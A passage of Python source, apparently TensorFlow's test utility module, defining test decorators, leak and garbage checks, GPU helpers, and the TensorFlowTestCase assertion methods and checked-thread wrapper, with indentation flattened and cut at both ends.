return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
with ops.Graph().as_default():
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
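# Typical use (the condition is illustrative): skip a test when an optional dependency is
# missing; a callable condition is evaluated at call time:
#   @skip_if(portpicker is None)
#   def testNeedsPortpicker(self):
#     ...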
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
class IsolateTest(object):
"""A context manager which isolates resources in its block.
Provides an Eager-agnostic abstraction for preventing the sharing of
variables and other resources.
In graph mode, resource handle ops are only executed in a particular Session,
isolating them from resources with the same name in other Graphs. In Eager,
separate Sessions do not exist, so resources (particularly ResourceVariables)
would be shared implicitly if a resource of the same name were created
anywhere in a Python process. Multiple handles to the same resource would
cause several issues, and so this type of sharing will raise an exception.
Using resources with the same name in a single Python process may be useful
(especially for unit tests), so this context manager provides an abstraction
for isolating resources. Using a resource created in one Isolation environment
in another is an error.
Example usage in Eager mode:
```python
import tensorflow as tf
# Import subject to change
from tensorflow.contrib.eager.python import tfe
tfe.enable_eager_execution()
for hyperparameter in [1, 2, 3]:
with tfe.IsolateTest():
v = tfe.Variable(name="v", initial_value=hyperparameter)
# train model, test results ...
```
IsolateTest is currently exposed through contrib.eager, but it creates a new
default Graph and provides equivalent safety in graph mode.
"""
def __init__(self):
if context.in_eager_mode() and tape.could_possibly_record():
raise ValueError("Cannot isolate Eager execution with an active tape.")
# In Eager, Graphs set a container which isolates resources, and maintain a
# VariableStore which caches ResourceVariable objects created through
# get_variable. So setting the default Graph has the side effect of
# isolating Eager resources.
with context.eager_mode():
# Create the graph in Eager mode, as this provides stricter semantics
# (i.e. has a unique container prefix). This prevents implicit sharing
# when a Graph-mode graph is created and then Eager mode is enabled (an
# error through enable_eager_execution, but common with context managers
# in unit tests).
self._graph_as_default_context_manager = ops.Graph().as_default()
def __enter__(self):
self._graph_as_default_context_manager.__enter__()
def __exit__(self, type_arg, value_arg, traceback_arg):
return self._graph_as_default_context_manager.__exit__(
type_arg, value_arg, traceback_arg)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensor(obj):
try:
return (isinstance(obj, ops.Tensor) or
isinstance(obj, variables.Variable))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(id(obj) for obj in gc.get_objects() if _is_tensor(obj))
outside_container_prefix = ops.get_default_graph()._container_prefix
with IsolateTest():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the container prefix so that we can print the values
# of variables which get leaked when executing eagerly.
ops.get_default_graph()._container_prefix = outside_container_prefix
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._last_zero = [None]
backprop._shape_dtype = [None, None]
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensor(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
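# Usage sketch for assert_no_new_tensors (illustrative only; the test class
# and method are hypothetical):
#
#   class LeakTest(TensorFlowTestCase):
#     @assert_no_new_tensors
#     def testNoLeak(self):
#       ...  # test body; no Tensor may outlive it
#
# The decorator snapshots the ids of live Tensors before the test, runs the
# test inside IsolateTest, clears the known caches, runs gc.collect(), and
# fails if any new Tensor objects are still reachable afterwards.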
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
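# Usage sketch for assert_no_garbage_created (illustrative only):
#
#   class CycleTest(TensorFlowTestCase):
#     @assert_no_garbage_created
#     def testNoReferenceCycles(self):
#       ...  # test body; must not create uncollectable reference cycles
#
# Because DEBUG_SAVEALL is sticky in some interpreters, prefer applying this
# to individual methods rather than to every test in a large shard.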
def run_in_graph_and_eager_modes(
__unused__=None, graph=None, config=None,
use_gpu=False, force_gpu=False,
reset_test=True, assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
    __unused__: Prevents silently skipping tests.

graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
    reset_test: If True, tearDown and setUp the test case again between runs.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
            f(self, **kwargs)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with IsolateTest():
run_eager_mode(self, **kwargs)
return decorated
return decorator
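# Usage sketch for run_in_graph_and_eager_modes (illustrative only). Note the
# trailing parentheses: the decorator factory must be called, which the
# `assert not __unused__` check above enforces.
#
#   class AddTest(TensorFlowTestCase):
#     @run_in_graph_and_eager_modes()
#     def testAdd(self):
#       x = constant_op.constant([1, 2])  # hypothetical import
#       self.assertAllEqual(self.evaluate(x + x), [2, 4])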
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
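# Usage sketch for is_gpu_available (illustrative only; the (3, 5) minimum
# compute capability is an arbitrary example value, and the helpers are
# hypothetical):
#
#   if is_gpu_available(cuda_only=True, min_cuda_compute_capability=(3, 5)):
#     run_gpu_variant()
#   else:
#     run_cpu_variant()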
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
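# Usage sketch for the device() helper (illustrative only): ops created in
# the block are placed on GPU only when one is actually available, so the
# same test code also runs on CPU-only machines.
#
#   with device(use_gpu=True):
#     result = math_ops.matmul(a, b)  # hypothetical tensors and import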
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times during a test, it will return the
    same folder. However, across different runs the directories will be
    different. This ensures that tests from different runs cannot pollute each
    other's environment.
    If you need multiple unique directories within a single test, you should
    use tempfile.mkdtemp as follows:
      tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
    Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
    in case of failure, as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
      The numpy values of `tensors`.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
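  # Usage sketch for evaluate() (illustrative only): the same call works in
  # both modes, returning .numpy() values in eager mode and running the
  # tensors through a Session in graph mode.
  #
  #   x = constant_op.constant(3.0)  # hypothetical import
  #   self.assertEqual(self.evaluate(x), 3.0)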
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
    This method behaves differently from session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
    `force_gpu` and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
        # CopyFrom() returns None, so copy into a fresh proto explicitly.
        config_copy = config_pb2.ConfigProto()
        config_copy.CopyFrom(config)
        config = config_copy
        config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
          an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
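  # Usage sketch for checkedThread (illustrative only; my_worker and queue
  # are hypothetical): exceptions raised in the worker are re-raised as test
  # failures when the thread is joined, and tearDown fails if a checked
  # thread was never joined.
  #
  #   t = self.checkedThread(target=my_worker, args=(queue,))
  #   t.start()
  #   t.join()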
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol, err_msg=msg)
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays, or dicts of same, have near values.
This does not support nested dicts. `a` and `b` can be namedtuples too,
which are converted to dicts.
Args:
      a: The expected numpy ndarray (or anything that can be converted to
        one), or dict of same. Must be a dict iff `b` is a dict.
      b: The actual numpy ndarray (or anything that can be converted to
        one), or dict of same. Must be a dict iff `a` is a dict.
rtol: relative tolerance.
atol: absolute tolerance.
Raises:
ValueError: if only one of `a` and `b` is a dict.
"""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
is_a_dict = isinstance(a, dict)
if is_a_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, %s vs %s." % (a, b))
if is_a_dict:
self.assertItemsEqual(
a.keys(), b.keys(),
msg="mismatched keys, expected %s, got %s" % (a.keys(), b.keys()))
for k in a:
self._assertArrayLikeAllClose(
a[k], b[k], rtol=rtol, atol=atol,
msg="%s: expected %s, got %s." % (k, a, b))
else:
self._assertArrayLikeAllClose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
      a: the expected numpy ndarray, or anything that can be converted to one.
      b: the actual numpy ndarray, or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol)
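  # Usage sketch for assertAllCloseAccordingToType (illustrative only): the
  # tolerance is widened automatically based on the loosest-tolerance dtype
  # involved, so a float16 comparison effectively uses half_rtol/half_atol.
  #
  #   a = np.array([1.0, 2.0], dtype=np.float16)
  #   b = a + 5e-4
  #   self.assertAllCloseAccordingToType(a, b)  # passes under the 1e-3 tol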
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
      a: the expected numpy ndarray, or anything that can be converted to one.
      b: the actual numpy ndarray, or anything that can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
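  # Usage sketch for assertRaisesOpError / assertRaisesWithPredicateMatch
  # (illustrative only; some_op is hypothetical):
  #
  #   with self.assertRaisesOpError("negative input not supported"):
  #     self.evaluate(some_op(-1.0))
  #
  #   with self.assertRaisesWithPredicateMatch(
  #       ValueError, lambda e: "shape" in str(e)):
  #     raise ValueError("bad shape")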
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
def create_local_cluster(num_workers, num_ps, protocol="grpc",
worker_config=None, ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
